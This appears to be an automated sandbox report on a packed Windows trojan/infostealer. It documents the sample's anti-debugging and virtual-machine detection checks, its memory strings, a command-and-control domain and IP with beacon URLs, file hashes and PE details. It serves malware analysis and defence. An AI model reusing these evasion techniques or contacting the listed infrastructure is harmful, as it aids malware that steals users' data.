Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74605AF second address: 7460603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FB0A4FB5B97h 0x00000009 pop eax 0x0000000a popad 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e call 00007FB0A4FB5B91h 0x00000013 mov eax, 451523F7h 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007FB0A4FB5B93h 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSpecial instruction interceptor: First address: 12DF11E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSpecial instruction interceptor: First address: 1504FCA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00DE9980 rdtsc 5_2_00DE9980
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,5_2_00C0255D
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,5_2_00C029FF
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,5_2_00C0255D
Source: xXe4fTmV2h.exe, xXe4fTmV2h.exe, 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: xXe4fTmV2h.exeBinary or memory string: Hyper-V RAW
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: xXe4fTmV2h.exe, 00000005.00000003.1327411652.0000000001A51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: xXe4fTmV2h.exe, 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: xXe4fTmV2h.exe, 00000005.00000003.1421458509.0000000001AAA000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1427566317.0000000001AB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile opened: NTICE
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile opened: SICE
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00DE9980 rdtsc 5_2_00DE9980
Source: xXe4fTmV2h.exe, xXe4fTmV2h.exe, 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: ~Program Manager
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: procmon.exe
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.11:49710 -> 5.101.3.217:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
xXe4fTmV2h.exe40%VirustotalBrowse
xXe4fTmV2h.exe53%ReversingLabsWin32.Trojan.Generic
xXe4fTmV2h.exe100%AviraTR/Crypt.TPM.Gen
xXe4fTmV2h.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF170%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0p0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862E0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=00%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868620%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lsef0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
5.101.3.217
truefalse
    		high
    httpbin.org
    		3.218.7.103
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0true
      • Avira URL Cloud: safe
      		unknown
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862true
      • Avira URL Cloud: safe
      		unknown
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlxXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpfalse
          		high
          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://html4/loose.dtdxXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpfalse
            		high
            https://curl.se/docs/alt-svc.html#xXe4fTmV2h.exefalse
              		high
              http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lsefxXe4fTmV2h.exe, 00000005.00000002.1427343914.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1422364338.0000000001A47000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://httpbin.org/ipbeforexXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpfalse
                		high
                http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862ExXe4fTmV2h.exe, 00000005.00000002.1427343914.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1422364338.0000000001A47000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://curl.se/docs/http-cookies.htmlxXe4fTmV2h.exe, xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpfalse
                  		high
                  http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0pxXe4fTmV2h.exe, 00000005.00000002.1427254897.0000000001A1E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://curl.se/docs/hsts.html#xXe4fTmV2h.exefalse
                    		high
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSxXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://curl.se/docs/alt-svc.htmlxXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpfalse
                      		high
                      http://.cssxXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpfalse
                        		high
                        http://.jpgxXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          5.101.3.217
                          		home.fiveth5ht.topRussian Federation
                          		34665PINDC-ASRUfalse
                          3.218.7.103
                          		httpbin.orgUnited States
                          		14618AMAZON-AESUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1581223
                          Start date and time:2024-12-27 08:46:48 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 7s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:11
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:xXe4fTmV2h.exe
                          renamed because original name is a hash value
                          Original Sample Name:764767d6adf6fa8a9c0b437d79a7a973.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          5.101.3.217lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          3.218.7.103lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                            w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                              E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                httpbin.orglolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                • 3.218.7.103
                                8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                • 34.226.108.155
                                w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                • 3.218.7.103
                                mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                • 34.226.108.155
                                HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                • 34.226.108.155
                                vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                                • 34.226.108.155
                                jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                                • 34.226.108.155
                                qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                                • 34.226.108.155
                                E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse
                                • 3.218.7.103
                                gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                • 34.226.108.155
                                home.fiveth5ht.toplolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                • 5.101.3.217
                                w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                • 5.101.3.217
                                mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                • 5.101.3.217
                                HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                • 5.101.3.217

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                PINDC-ASRUlolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                • 5.101.3.217
                                w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                • 5.101.3.217
                                mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                • 5.101.3.217
                                HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                • 5.101.3.217
                                6ufJvua5w2.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                                • 91.215.85.11
                                Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                • 91.215.85.142
                                3cb770h94r.elfGet hashmaliciousOkiruBrowse
                                • 45.145.172.130
                                na.elfGet hashmaliciousMiraiBrowse
                                • 5.188.210.194
                                na.elfGet hashmaliciousMirai, MoobotBrowse
                                • 5.8.21.138
                                lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                                • 80.87.206.189
                                AMAZON-AESUSlolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                • 3.218.7.103
                                8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                • 34.226.108.155
                                w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                • 3.218.7.103
                                db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                • 50.17.226.153
                                mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                • 34.226.108.155
                                HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                • 34.226.108.155
                                vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                                • 34.226.108.155
                                jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                                • 34.226.108.155
                                qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                                • 34.226.108.155
                                E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse
                                • 3.218.7.103

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Entropy (8bit):7.985111161252114
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • VXD Driver (31/22) 0.00%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:xXe4fTmV2h.exe
                                File size:4'450'816 bytes
                                MD5:764767d6adf6fa8a9c0b437d79a7a973
                                SHA1:f06803c1321e1b613f494e337a3e7b6c11f2e880
                                SHA256:f938e11a28c63ca465cec4151a02add7ff1f534d31eb8ad1e4e765620da43762
                                SHA512:961330c1e2c92edcce9c845e1c038215c772b5b838785d4fccfd54a037c7145341edfc8a0ce560166d4adddf066289691ec4176b43d559b2b0da9eac7b4cd3ef
                                SSDEEP:98304:x9GpNaOCU/IL0l0xW0Qs/Sy2rETtfzX13+BYoL2:x9GpN55UW0QIAriJ8Yo
                                TLSH:C0263348BD143DA6E4EE84B080B3601DF3F527825A6AE1EC0DC6674D7967384FEE5836
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@...................................D...@... ............................

                                File Icon

                                Icon Hash:90cececece8e8eb0

                                Static PE Info

                                General

                                Entrypoint:0x101b000
                                Entrypoint Section:.taggant
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                DLL Characteristics:DYNAMIC_BASE
                                Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Authenticode Signature

                                Signature Valid:
                                Signature Issuer:
                                Signature Validation Error:
                                Error Number:
                                Not Before, Not After
                                  Subject Chain
                                    Version:
                                    Thumbprint MD5:
                                    Thumbprint SHA-1:
                                    Thumbprint SHA-256:
                                    Serial:

                                    Entrypoint Preview

                                    Instruction
                                    jmp 00007FB0A4EF8F2Ah
                                    bswap eax
                                    inc ebx
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add cl, ch
                                    add byte ptr [eax], ah
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], al
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], dh
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax*4], cl
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add eax, 0000000Ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], dh
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+00h], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [eax+00000000h], eax
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add eax, 0000000Ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], dh
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [edx], ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], al
                                    add byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    pop es
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+0Ah], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    or al, 80h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc191d80x10mizvqalk
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0xc191880x18mizvqalk
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x6db0000x288a00209c84acdb3b42c53790cf5252ba749eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x6dc0000x1ac0x20051464645db0f03772ae3ac4890f37dffFalse0.58203125data4.594935129031665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x6de0000x3890000x200d60579a50c6c439d428bafff4bc9f679unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
